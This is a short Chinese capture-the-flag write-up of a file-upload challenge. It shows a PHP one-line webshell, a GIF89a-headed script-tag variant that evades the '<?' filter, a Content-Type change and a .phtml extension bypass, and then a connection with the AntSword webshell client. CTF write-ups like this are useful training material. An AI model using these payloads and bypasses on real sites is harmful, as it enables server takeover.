文件上传-[极客大挑战 2019]Upload 1

首先打开网址之后是一个文件上传

文件上传-[极客大挑战 2019]Upload 1

 

 

 直接上传一句话木马

<?php @eval($_POST['attack']);?>

文件上传-[极客大挑战 2019]Upload 1

 

 然后我们抓包改成Content-Type:image/jpeg

文件上传-[极客大挑战 2019]Upload 1

 

之后又发现其对文件后缀名进行了限制过滤了(绕过的方法php3,php4,php5,phtml,pht)

发现php3,php4,php5被过滤了将文件后缀改成phtml就可以

文件上传-[极客大挑战 2019]Upload 1

 

 发现文件里面不允许包含<?

那么绕过

 

 GIF89a? <script language="php">eval($_REQUEST[1])</script>

文件上传-[极客大挑战 2019]Upload 1

 

 上传成功

接下来找文件路径

基本都是upload/filename

文件上传-[极客大挑战 2019]Upload 1

 

 然后找到路径使用蚁剑连接

文件上传-[极客大挑战 2019]Upload 1

 

 getflag

文件上传-[极客大挑战 2019]Upload 1

 

上一篇:java – 询问ZonedDateTime询问是否在标准时间或夏令时(DST)


下一篇:spring – @CreatedBy和@LastModifiedDate不再使用ZonedDateTime了?